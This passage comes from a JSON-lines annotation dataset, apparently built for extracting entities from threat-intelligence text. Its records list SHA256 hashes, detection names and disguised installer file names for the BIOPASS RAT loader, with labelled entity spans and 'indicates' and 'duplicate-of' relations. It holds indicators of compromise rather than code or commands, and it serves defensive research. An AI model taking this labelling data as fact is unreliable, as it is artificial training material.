System.exe","entities":[{"id":10219,"label":"SHA2","start_offset":27,"end_offset":91},{"id":10220,"label":"malware","start_offset":114,"end_offset":125},{"id":49022,"label":"FILEPATH","start_offset":93,"end_offset":112},{"id":10221,"label":"SHA2","start_offset":160,"end_offset":224},{"id":49021,"label":"malware","start_offset":1,"end_offset":25},{"id":49023,"label":"malware","start_offset":134,"end_offset":158},{"id":49024,"label":"FILEPATH","start_offset":226,"end_offset":236}],"relations":[{"id":558,"from_id":10219,"to_id":10220,"type":"indicates"},{"id":559,"from_id":49022,"to_id":10220,"type":"indicates"},{"id":560,"from_id":10221,"to_id":49023,"type":"indicates"},{"id":561,"from_id":49024,"to_id":49023,"type":"indicates"},{"id":562,"from_id":49023,"to_id":10220,"type":"duplicate-of"},{"id":563,"from_id":49021,"to_id":10220,"type":"duplicate-of"},{"id":564,"from_id":10219,"to_id":49022,"type":"duplicate-of"},{"id":565,"from_id":10221,"to_id":49024,"type":"duplicate-of"}],"Comments":[]} {"id":3379,"text":"test3.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 281c938448e32eb12fe8c5439ef06cea848668cf57fed5ad64b9a8d1e07de561","entities":[{"id":10224,"label":"malware","start_offset":11,"end_offset":22},{"id":10225,"label":"SHA2","start_offset":57,"end_offset":121},{"id":49026,"label":"FILEPATH","start_offset":0,"end_offset":9},{"id":49027,"label":"malware","start_offset":31,"end_offset":55}],"relations":[{"id":566,"from_id":49026,"to_id":10224,"type":"indicates"},{"id":567,"from_id":10225,"to_id":10224,"type":"indicates"},{"id":568,"from_id":49027,"to_id":10224,"type":"duplicate-of"},{"id":569,"from_id":49026,"to_id":10225,"type":"duplicate-of"}],"Comments":[]} {"id":3381,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 2b580af1cdc4655ae75ef503aba7600e05cdd68b056a9354a2184b7fbb24db6f Silverlight_ins.exe ","entities":[{"id":10226,"label":"malware","start_offset":0,"end_offset":11},{"id":10227,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49029,"label":"malware","start_offset":20,"end_offset":44},{"id":49030,"label":"FILEPATH","start_offset":112,"end_offset":131}],"relations":[{"id":570,"from_id":10226,"to_id":49029,"type":"duplicate-of"},{"id":571,"from_id":10227,"to_id":49029,"type":"indicates"},{"id":572,"from_id":49030,"to_id":49029,"type":"indicates"},{"id":573,"from_id":49030,"to_id":10227,"type":"duplicate-of"}],"Comments":[]} {"id":3382,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 30a65a54acfbf8d412ade728cad86c5c769befa4e456f7c0e552e1ab0862a446 flash-64.exe","entities":[{"id":10228,"label":"malware","start_offset":0,"end_offset":11},{"id":10229,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49032,"label":"FILEPATH","start_offset":112,"end_offset":124},{"id":49031,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":574,"from_id":49032,"to_id":10229,"type":"duplicate-of"},{"id":575,"from_id":10228,"to_id":49031,"type":"duplicate-of"},{"id":576,"from_id":49032,"to_id":49031,"type":"indicates"},{"id":577,"from_id":10229,"to_id":49031,"type":"indicates"}],"Comments":[]} {"id":3383,"text":"BIOPASS RAT Loader Backdoor.Win32.BIOPASS.A 30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe Silverlight_ins.exe ","entities":[{"id":10230,"label":"malware","start_offset":0,"end_offset":11},{"id":10231,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49034,"label":"FILEPATH","start_offset":112,"end_offset":131},{"id":49033,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":578,"from_id":10230,"to_id":49033,"type":"duplicate-of"},{"id":579,"from_id":49034,"to_id":10231,"type":"duplicate-of"},{"id":580,"from_id":49034,"to_id":49033,"type":"indicates"},{"id":581,"from_id":10231,"to_id":49033,"type":"indicates"}],"Comments":[]} {"id":3384,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 3195c355aa564ea66b4b37baa9547cb53dde7cf4ae7010256db92fff0bde873d flash.exe","entities":[{"id":10232,"label":"malware","start_offset":0,"end_offset":11},{"id":10233,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49035,"label":"malware","start_offset":20,"end_offset":44},{"id":49036,"label":"FILEPATH","start_offset":112,"end_offset":121}],"relations":[{"id":582,"from_id":10232,"to_id":49035,"type":"duplicate-of"},{"id":583,"from_id":49036,"to_id":10233,"type":"duplicate-of"},{"id":584,"from_id":49036,"to_id":49035,"type":"indicates"},{"id":585,"from_id":10233,"to_id":49035,"type":"indicates"}],"Comments":[]} {"id":3385,"text":" BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 32a3934d96a8f2dae805fa28355cd0155c22ffad4545f9cd9c1ba1e9545b39ac","entities":[{"id":10234,"label":"malware","start_offset":1,"end_offset":12},{"id":10235,"label":"SHA2","start_offset":47,"end_offset":111},{"id":49037,"label":"malware","start_offset":21,"end_offset":45}],"relations":[{"id":586,"from_id":10234,"to_id":49037,"type":"duplicate-of"},{"id":587,"from_id":10235,"to_id":49037,"type":"indicates"}],"Comments":[]} {"id":3389,"text":"test3.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 344cdbc2a7e0908cb6638bc7b81b6b697b32755bad3bed09c511866eff3876c7","entities":[{"id":10238,"label":"malware","start_offset":11,"end_offset":22},{"id":10239,"label":"SHA2","start_offset":57,"end_offset":121},{"id":49041,"label":"malware","start_offset":31,"end_offset":55},{"id":49040,"label":"FILEPATH","start_offset":0,"end_offset":9}],"relations":[{"id":588,"from_id":49040,"to_id":49041,"type":"indicates"},{"id":589,"from_id":10238,"to_id":49041,"type":"duplicate-of"},{"id":590,"from_id":49040,"to_id":10239,"type":"duplicate-of"},{"id":591,"from_id":10239,"to_id":49041,"type":"indicates"}],"Comments":[]} {"id":3390,"text":"test4.exe BIOPASS RAT Loader Backdoor.Win32.BIOPASS.A 3589e53c59d9807cca709387bbcaaffc7e24e15d9a78425b717fc55c779b928e","entities":[{"id":10240,"label":"malware","start_offset":11,"end_offset":22},{"id":10241,"label":"SHA2","start_offset":57,"end_offset":121},{"id":49042,"label":"FILEPATH","start_offset":0,"end_offset":9},{"id":49043,"label":"malware","start_offset":31,"end_offset":55}],"relations":[{"id":592,"from_id":49042,"to_id":49043,"type":"indicates"},{"id":593,"from_id":10241,"to_id":49043,"type":"indicates"},{"id":594,"from_id":10240,"to_id":49043,"type":"duplicate-of"},{"id":595,"from_id":49042,"to_id":10241,"type":"duplicate-of"}],"Comments":[]} {"id":3392,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 36e3fcd6a4c7c9db985be77ea6394b2ed019332fdae4739df2f96a541ea52617 Silverlight.exe","entities":[{"id":10242,"label":"malware","start_offset":0,"end_offset":11},{"id":10243,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49045,"label":"malware","start_offset":20,"end_offset":44},{"id":49046,"label":"FILEPATH","start_offset":112,"end_offset":127}],"relations":[{"id":596,"from_id":10242,"to_id":49045,"type":"duplicate-of"},{"id":597,"from_id":49046,"to_id":10243,"type":"duplicate-of"},{"id":598,"from_id":49046,"to_id":49045,"type":"indicates"},{"id":599,"from_id":10243,"to_id":49045,"type":"indicates"}],"Comments":[]} {"id":3393,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 3e8f8b8a5f70c195a2e4d4fc7f80523809f6dbf9ead061ce8ef04fb489a577cf test-flash.exe BIOPASS RAT Loader Backdoor.Win32.BIOPASS.A 5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba flash_installer.exe ","entities":[{"id":10244,"label":"malware","start_offset":0,"end_offset":11},{"id":10246,"label":"malware","start_offset":128,"end_offset":139},{"id":10245,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10247,"label":"SHA2","start_offset":174,"end_offset":238},{"id":49048,"label":"malware","start_offset":20,"end_offset":44},{"id":49047,"label":"malware","start_offset":148,"end_offset":172},{"id":49050,"label":"FILEPATH","start_offset":240,"end_offset":259},{"id":49049,"label":"FILEPATH","start_offset":112,"end_offset":126}],"relations":[{"id":600,"from_id":10244,"to_id":49048,"type":"duplicate-of"},{"id":601,"from_id":10246,"to_id":49047,"type":"duplicate-of"},{"id":602,"from_id":49049,"to_id":10245,"type":"duplicate-of"},{"id":603,"from_id":49050,"to_id":10247,"type":"duplicate-of"},{"id":604,"from_id":10247,"to_id":49047,"type":"indicates"},{"id":605,"from_id":49050,"to_id":49047,"type":"indicates"},{"id":606,"from_id":49049,"to_id":49048,"type":"indicates"},{"id":607,"from_id":10245,"to_id":49048,"type":"indicates"}],"Comments":[]} {"id":3394,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 5fd2da648068f75a4a66b08d6d93793f735be62ae88085a79d839b6a0d6d859a flash1.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 660cef8210f823acb0b31d78fbce1d6f3f8c4f43231286f7ac69f75b2c42c020 flashplayerpp_install_cn.exe","entities":[{"id":10248,"label":"malware","start_offset":0,"end_offset":11},{"id":10249,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10250,"label":"malware","start_offset":124,"end_offset":135},{"id":10251,"label":"SHA2","start_offset":170,"end_offset":234},{"id":49052,"label":"malware","start_offset":144,"end_offset":168},{"id":49053,"label":"FILEPATH","start_offset":236,"end_offset":264},{"id":49054,"label":"FILEPATH","start_offset":112,"end_offset":122},{"id":49051,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":608,"from_id":10248,"to_id":49051,"type":"duplicate-of"},{"id":609,"from_id":10250,"to_id":49052,"type":"duplicate-of"},{"id":610,"from_id":49054,"to_id":10249,"type":"duplicate-of"},{"id":611,"from_id":49053,"to_id":10251,"type":"duplicate-of"},{"id":612,"from_id":10251,"to_id":49052,"type":"indicates"},{"id":613,"from_id":49053,"to_id":49052,"type":"indicates"},{"id":614,"from_id":49054,"to_id":49051,"type":"indicates"},{"id":615,"from_id":10249,"to_id":49051,"type":"indicates"}],"Comments":[]} {"id":3395,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 69d930050b2445937ec6a4f9887296928bf663f7a71132676be3f112e80fe275 test.exe ","entities":[{"id":10252,"label":"malware","start_offset":0,"end_offset":11},{"id":10253,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49056,"label":"FILEPATH","start_offset":112,"end_offset":120},{"id":49055,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":616,"from_id":49056,"to_id":10253,"type":"duplicate-of"},{"id":617,"from_id":10252,"to_id":49055,"type":"duplicate-of"},{"id":619,"from_id":10253,"to_id":49055,"type":"indicates"},{"id":618,"from_id":49056,"to_id":49055,"type":"indicates"}],"Comments":[]} {"id":3396,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 6a0976e5f9d07ff3d80fa2958976183758ba5fcdd4645e391614a347b4b8e64b f0b96efe2f714e7bddf76cc90a8b8c88_se.exe ","entities":[{"id":10254,"label":"malware","start_offset":0,"end_offset":11},{"id":10255,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10256,"label":"FILEPATH","start_offset":112,"end_offset":151},{"id":49057,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":620,"from_id":10254,"to_id":49057,"type":"duplicate-of"},{"id":621,"from_id":10256,"to_id":10255,"type":"duplicate-of"},{"id":622,"from_id":10256,"to_id":49057,"type":"indicates"},{"id":623,"from_id":10255,"to_id":49057,"type":"indicates"}],"Comments":[]} {"id":3397,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 6ee8f6a0c514a5bd25f7a32210f4b3fe878d9d417a7ebe07befc285131bae10e news.exe","entities":[{"id":10258,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10257,"label":"malware","start_offset":0,"end_offset":11},{"id":49059,"label":"FILEPATH","start_offset":112,"end_offset":120},{"id":49058,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":626,"from_id":49059,"to_id":49058,"type":"indicates"},{"id":627,"from_id":10258,"to_id":49058,"type":"indicates"},{"id":624,"from_id":10257,"to_id":49058,"type":"duplicate-of"},{"id":625,"from_id":49059,"to_id":10258,"type":"duplicate-of"}],"Comments":[]} {"id":3398,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 75e03f40a088903579a436c0d8e8bc3d0d71cf2942ad793cc948f36866a2e1ad silverlight_ins.exe ","entities":[{"id":10259,"label":"malware","start_offset":0,"end_offset":11},{"id":49060,"label":"malware","start_offset":20,"end_offset":44},{"id":10260,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49061,"label":"FILEPATH","start_offset":112,"end_offset":131}],"relations":[{"id":628,"from_id":49061,"to_id":10260,"type":"duplicate-of"},{"id":629,"from_id":10259,"to_id":49060,"type":"duplicate-of"},{"id":630,"from_id":10260,"to_id":49060,"type":"indicates"},{"id":631,"from_id":49061,"to_id":49060,"type":"indicates"}],"Comments":[]} {"id":3399,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 7d0d7d416db5bd7201420982987e213a129eef2314193e4558a24f3c9a91a38e flash_installer.exe ","entities":[{"id":10261,"label":"malware","start_offset":0,"end_offset":11},{"id":10262,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49062,"label":"malware","start_offset":20,"end_offset":44},{"id":49063,"label":"FILEPATH","start_offset":112,"end_offset":131}],"relations":[{"id":632,"from_id":49063,"to_id":49062,"type":"indicates"},{"id":633,"from_id":10262,"to_id":49062,"type":"indicates"},{"id":634,"from_id":10261,"to_id":49062,"type":"duplicate-of"},{"id":635,"from_id":10262,"to_id":49063,"type":"duplicate-of"}],"Comments":[]} {"id":3400,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0 Silverlight.exe","entities":[{"id":10263,"label":"malware","start_offset":0,"end_offset":11},{"id":10264,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49064,"label":"malware","start_offset":20,"end_offset":44},{"id":49065,"label":"FILEPATH","start_offset":112,"end_offset":127}],"relations":[{"id":636,"from_id":10263,"to_id":49064,"type":"duplicate-of"},{"id":637,"from_id":49065,"to_id":10264,"type":"duplicate-of"},{"id":638,"from_id":10264,"to_id":49064,"type":"indicates"},{"id":639,"from_id":49065,"to_id":49064,"type":"indicates"}],"Comments":[]} {"id":3401,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 8445c0189735766edf0e3d01b91f6f98563fef272ac5c92d3701a1174ad072dd Silverlight_ins.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 89c0b2036ce8d1d91f6d8b8171219aafcd6237c811770fa16edf922cedfecc54 MTYwOTI1MzEzNQ==.exe BIOPASS RAT Loader Backdoor.","entities":[{"id":10265,"label":"malware","start_offset":0,"end_offset":11},{"id":10266,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10267,"label":"malware","start_offset":133,"end_offset":144},{"id":10268,"label":"SHA2","start_offset":179,"end_offset":243},{"id":10269,"label":"malware","start_offset":267,"end_offset":278},{"id":49066,"label":"malware","start_offset":20,"end_offset":44},{"id":49067,"label":"FILEPATH","start_offset":112,"end_offset":131},{"id":49068,"label":"malware","start_offset":153,"end_offset":177},{"id":49069,"label":"FILEPATH","start_offset":245,"end_offset":265}],"relations":[{"id":640,"from_id":10265,"to_id":49066,"type":"duplicate-of"},{"id":641,"from_id":49067,"to_id":10266,"type":"duplicate-of"},{"id":642,"from_id":10267,"to_id":49068,"type":"duplicate-of"},{"id":643,"from_id":10269,"to_id":49068,"type":"duplicate-of"},{"id":644,"from_id":10268,"to_id":49069,"type":"duplicate-of"},{"id":645,"from_id":49067,"to_id":49066,"type":"indicates"},{"id":646,"from_id":10266,"to_id":49066,"type":"indicates"},{"id":647,"from_id":10268,"to_id":10269,"type":"indicates"},{"id":648,"from_id":49069,"to_id":10269,"type":"indicates"}],"Comments":[]} {"id":3403,"text":" 8b5d4840bbdce0798950cd5584e3d4564581a7698bc6cfb2892c97b826129cec Silverlight_ins.exe","entities":[{"id":10270,"label":"SHA2","start_offset":1,"end_offset":65},{"id":49071,"label":"FILEPATH","start_offset":67,"end_offset":86}],"relations":[{"id":649,"from_id":10270,"to_id":49071,"type":"duplicate-of"}],"Comments":[]} {"id":3408,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 98a91356e0094c96d81bd27af407dd48c3c91aaf97da6794aeb303597a773749 Silverlight1.exe","entities":[{"id":10273,"label":"malware","start_offset":0,"end_offset":11},{"id":10274,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49074,"label":"malware","start_offset":20,"end_offset":44},{"id":49075,"label":"FILEPATH","start_offset":112,"end_offset":128}],"relations":[{"id":650,"from_id":10273,"to_id":49074,"type":"duplicate-of"},{"id":651,"from_id":49075,"to_id":10274,"type":"duplicate-of"},{"id":652,"from_id":49075,"to_id":49074,"type":"indicates"},{"id":653,"from_id":10274,"to_id":49074,"type":"indicates"}],"Comments":[]} {"id":3409,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 9eed9a2e0edf38f6354f4e57b3a6b9bed5b19263f54bcee19e66fc8af0c29e4e test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 9f34d28562e7e1e3721bbf679c58aa8f5898995ed999a641f26de120f3a42cf4 Silverlight1.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 9ff906ffcde32e4c6fb3ea4652e6d6326713a7fde8bb783b52f12a1f382f8798 test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A a7c4dac7176e291bd2aba860e1aa301fb5f7d880794f493f2dea0982e2b7eb31 test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A b48e01ff816f12125f9f4cfc9180d534c7c57ef4ee50c0ebbe445e88d4ade939 test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A b82bde3fe5ee900a76ac27b4869ed9aa0802c63bbd72b3bfb0f1abce6340cc6c Silverlight_ins.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A b9d0838be8952ebd4218c8f548ce94901f789ec1e32f5eaf46733f0c94c77999 Silverlight_ins.exe ","entities":[{"id":10275,"label":"malware","start_offset":0,"end_offset":11},{"id":10276,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10277,"label":"malware","start_offset":122,"end_offset":133},{"id":10279,"label":"malware","start_offset":252,"end_offset":263},{"id":10281,"label":"malware","start_offset":374,"end_offset":385},{"id":10282,"label":"SHA2","start_offset":420,"end_offset":484},{"id":10283,"label":"malware","start_offset":496,"end_offset":507},{"id":10284,"label":"SHA2","start_offset":542,"end_offset":606},{"id":10285,"label":"malware","start_offset":618,"end_offset":629},{"id":10286,"label":"SHA2","start_offset":664,"end_offset":728},{"id":10287,"label":"malware","start_offset":751,"end_offset":762},{"id":10288,"label":"SHA2","start_offset":797,"end_offset":861},{"id":10278,"label":"SHA2","start_offset":168,"end_offset":232},{"id":10280,"label":"SHA2","start_offset":298,"end_offset":362},{"id":49076,"label":"malware","start_offset":20,"end_offset":44},{"id":49078,"label":"FILEPATH","start_offset":234,"end_offset":250},{"id":49079,"label":"malware","start_offset":272,"end_offset":296},{"id":49081,"label":"malware","start_offset":394,"end_offset":418},{"id":49083,"label":"malware","start_offset":516,"end_offset":540},{"id":49087,"label":"malware","start_offset":771,"end_offset":795},{"id":49077,"label":"malware","start_offset":142,"end_offset":166},{"id":49080,"label":"FILEPATH","start_offset":364,"end_offset":372},{"id":49084,"label":"FILEPATH","start_offset":608,"end_offset":616},{"id":49086,"label":"FILEPATH","start_offset":730,"end_offset":749},{"id":49088,"label":"FILEPATH","start_offset":863,"end_offset":882},{"id":49089,"label":"FILEPATH","start_offset":112,"end_offset":120},{"id":49082,"label":"FILEPATH","start_offset":486,"end_offset":494},{"id":49085,"label":"malware","start_offset":638,"end_offset":662}],"relations":[{"id":654,"from_id":10275,"to_id":49076,"type":"duplicate-of"},{"id":655,"from_id":10277,"to_id":49077,"type":"duplicate-of"},{"id":656,"from_id":10279,"to_id":49079,"type":"duplicate-of"},{"id":657,"from_id":10281,"to_id":49081,"type":"duplicate-of"},{"id":658,"from_id":10283,"to_id":49083,"type":"duplicate-of"},{"id":659,"from_id":10285,"to_id":49085,"type":"duplicate-of"},{"id":660,"from_id":10287,"to_id":49087,"type":"duplicate-of"},{"id":661,"from_id":49088,"to_id":10288,"type":"duplicate-of"},{"id":662,"from_id":49086,"to_id":10286,"type":"duplicate-of"},{"id":663,"from_id":49084,"to_id":10284,"type":"duplicate-of"},{"id":664,"from_id":49082,"to_id":10282,"type":"duplicate-of"},{"id":665,"from_id":49080,"to_id":10280,"type":"duplicate-of"},{"id":666,"from_id":49078,"to_id":10278,"type":"duplicate-of"},{"id":667,"from_id":49089,"to_id":10276,"type":"duplicate-of"},{"id":668,"from_id":10276,"to_id":49076,"type":"indicates"},{"id":669,"from_id":49089,"to_id":49076,"type":"indicates"},{"id":670,"from_id":49078,"to_id":49077,"type":"indicates"},{"id":671,"from_id":10278,"to_id":49077,"type":"indicates"},{"id":672,"from_id":49080,"to_id":49079,"type":"indicates"},{"id":673,"from_id":10280,"to_id":49079,"type":"indicates"},{"id":674,"from_id":49082,"to_id":49081,"type":"indicates"},{"id":675,"from_id":10282,"to_id":49081,"type":"indicates"},{"id":676,"from_id":49084,"to_id":49083,"type":"indicates"},{"id":677,"from_id":10284,"to_id":49083,"type":"indicates"},{"id":678,"from_id":49086,"to_id":49085,"type":"indicates"},{"id":679,"from_id":10286,"to_id":49085,"type":"indicates"},{"id":680,"from_id":49088,"to_id":10287,"type":"indicates"}],"Comments":[]} {"id":3410,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A ba44c22a3224c3a201202b69d86df2a78f0cd1d4ac1119eb29cae33f09027a9a Silverlight2.exe","entities":[{"id":10289,"label":"malware","start_offset":0,"end_offset":11},{"id":10290,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49090,"label":"malware","start_offset":20,"end_offset":44},{"id":49091,"label":"FILEPATH","start_offset":112,"end_offset":128}],"relations":[{"id":681,"from_id":10289,"to_id":49090,"type":"duplicate-of"},{"id":682,"from_id":49091,"to_id":10290,"type":"duplicate-of"},{"id":683,"from_id":49091,"to_id":49090,"type":"indicates"},{"id":684,"from_id":10290,"to_id":49090,"type":"indicates"}],"Comments":[]} {"id":3411,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A bd8dc7e3909f6663c0fff653d7afbca2b89f2e9bc6f27adaab27f640ccf52975 Silverlight.exe ","entities":[{"id":10291,"label":"malware","start_offset":0,"end_offset":11},{"id":10292,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49092,"label":"malware","start_offset":20,"end_offset":44},{"id":49093,"label":"FILEPATH","start_offset":112,"end_offset":127}],"relations":[{"id":685,"from_id":10291,"to_id":49092,"type":"duplicate-of"},{"id":686,"from_id":49093,"to_id":10292,"type":"duplicate-of"},{"id":687,"from_id":49093,"to_id":49092,"type":"indicates"},{"id":688,"from_id":10292,"to_id":49092,"type":"indicates"}],"Comments":[]} {"id":3412,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A bf4f50979b7b29f2b6d192630b8d7b76adb9cb65157a1c70924a47bf519c4edd test.exe","entities":[{"id":10293,"label":"malware","start_offset":0,"end_offset":11},{"id":10294,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49094,"label":"malware","start_offset":20,"end_offset":44},{"id":49095,"label":"FILEPATH","start_offset":112,"end_offset":120}],"relations":[{"id":689,"from_id":10293,"to_id":49094,"type":"duplicate-of"},{"id":690,"from_id":49095,"to_id":10294,"type":"duplicate-of"},{"id":691,"from_id":49095,"to_id":49094,"type":"indicates"},{"id":692,"from_id":10294,"to_id":49094,"type":"indicates"}],"Comments":[]} {"id":3413,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A c11906210465045a54a5de1053ce0624308a8c7b342bb707a24e534ca662dc89 test-flash.exe BIOPASS RAT Loader Backdoor.Win32.BIOPASS.A c3fa69e15a63b151f8d1dc3018284e153ad2eb672d54555eaeaac79396b64e3b test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A c47fabc47806961f908bed37d6b1bbbfd183d564a2d01b7cae87bd95c20ff8a5 flashplayerpp_install_cn.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A c8542bffc7a2074b8d84c4de5f18e3c8ced30b1f6edc13047ce99794b388285c flash2.exe BIOPASS RAT Loader Backdoor.","entities":[{"id":10295,"label":"malware","start_offset":0,"end_offset":11},{"id":10296,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10297,"label":"malware","start_offset":128,"end_offset":139},{"id":10298,"label":"SHA2","start_offset":174,"end_offset":238},{"id":10299,"label":"malware","start_offset":250,"end_offset":261},{"id":10300,"label":"SHA2","start_offset":296,"end_offset":360},{"id":10301,"label":"malware","start_offset":392,"end_offset":403},{"id":10303,"label":"malware","start_offset":516,"end_offset":527},{"id":10302,"label":"SHA2","start_offset":438,"end_offset":502},{"id":49098,"label":"FILEPATH","start_offset":112,"end_offset":126},{"id":49101,"label":"FILEPATH","start_offset":362,"end_offset":390},{"id":49102,"label":"malware","start_offset":412,"end_offset":436},{"id":49096,"label":"malware","start_offset":20,"end_offset":44},{"id":49097,"label":"malware","start_offset":148,"end_offset":172},{"id":49099,"label":"FILEPATH","start_offset":240,"end_offset":248},{"id":49100,"label":"malware","start_offset":270,"end_offset":294},{"id":49103,"label":"FILEPATH","start_offset":504,"end_offset":514}],"relations":[{"id":696,"from_id":10298,"to_id":49099,"type":"duplicate-of"},{"id":698,"from_id":49101,"to_id":10300,"type":"duplicate-of"},{"id":700,"from_id":49103,"to_id":10302,"type":"duplicate-of"},{"id":701,"from_id":10296,"to_id":49096,"type":"indicates"},{"id":702,"from_id":49098,"to_id":49096,"type":"indicates"},{"id":703,"from_id":10298,"to_id":49097,"type":"indicates"},{"id":704,"from_id":49099,"to_id":49097,"type":"indicates"},{"id":693,"from_id":10295,"to_id":49096,"type":"duplicate-of"},{"id":694,"from_id":49098,"to_id":10296,"type":"duplicate-of"},{"id":695,"from_id":10297,"to_id":49097,"type":"duplicate-of"},{"id":697,"from_id":10299,"to_id":49100,"type":"duplicate-of"},{"id":699,"from_id":10301,"to_id":49102,"type":"duplicate-of"},{"id":705,"from_id":49101,"to_id":49100,"type":"indicates"},{"id":706,"from_id":10300,"to_id":49100,"type":"indicates"},{"id":707,"from_id":10302,"to_id":49102,"type":"indicates"},{"id":708,"from_id":49103,"to_id":49102,"type":"indicates"}],"Comments":[]} {"id":3417,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A d18d84d32a340d20ab07a36f9e4b959495ecd88d7b0e9799399fcc4e959f536b flash_installer.exe","entities":[{"id":10305,"label":"malware","start_offset":0,"end_offset":11},{"id":10306,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49106,"label":"malware","start_offset":20,"end_offset":44},{"id":49107,"label":"FILEPATH","start_offset":112,"end_offset":131}],"relations":[{"id":709,"from_id":10305,"to_id":49106,"type":"duplicate-of"},{"id":711,"from_id":10306,"to_id":49106,"type":"indicates"},{"id":710,"from_id":49107,"to_id":10306,"type":"duplicate-of"},{"id":712,"from_id":49107,"to_id":49106,"type":"indicates"}],"Comments":[]} {"id":3422,"text":" Backdoor.Win64.BIOPASS.A e52ea54cfe3afd93a53e368245c5630425e326291bf1b2599b75dbf8e75b7aeb flashplayer_install_cn.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A f1ad25b594a855a3c9af75c5da74b44d900f6fbb655033f9a98a956292011c8e Silverlight.exe","entities":[{"id":10311,"label":"malware","start_offset":121,"end_offset":132},{"id":10310,"label":"SHA2","start_offset":27,"end_offset":91},{"id":10312,"label":"SHA2","start_offset":167,"end_offset":231},{"id":49110,"label":"malware","start_offset":1,"end_offset":25},{"id":49111,"label":"malware","start_offset":141,"end_offset":165},{"id":49112,"label":"FILEPATH","start_offset":93,"end_offset":119},{"id":49113,"label":"FILEPATH","start_offset":233,"end_offset":248}],"relations":[{"id":716,"from_id":49113,"to_id":49111,"type":"indicates"},{"id":717,"from_id":10311,"to_id":49111,"type":"duplicate-of"},{"id":713,"from_id":49112,"to_id":10310,"type":"duplicate-of"},{"id":714,"from_id":49113,"to_id":10312,"type":"duplicate-of"},{"id":715,"from_id":10312,"to_id":49111,"type":"indicates"},{"id":718,"from_id":49112,"to_id":49110,"type":"indicates"},{"id":719,"from_id":10310,"to_id":49110,"type":"indicates"}],"Comments":[]} {"id":3423,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A fa1d70b6b5b1a5e478c7d9d840aae0cc23d80476d9eea884a73d1b7e3926a209 64.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A fa7fbca583b22d92ae6d832d90ee637cc6ac840203cd059c6582298beb955aee test.exe BIOPASS RAT Loader 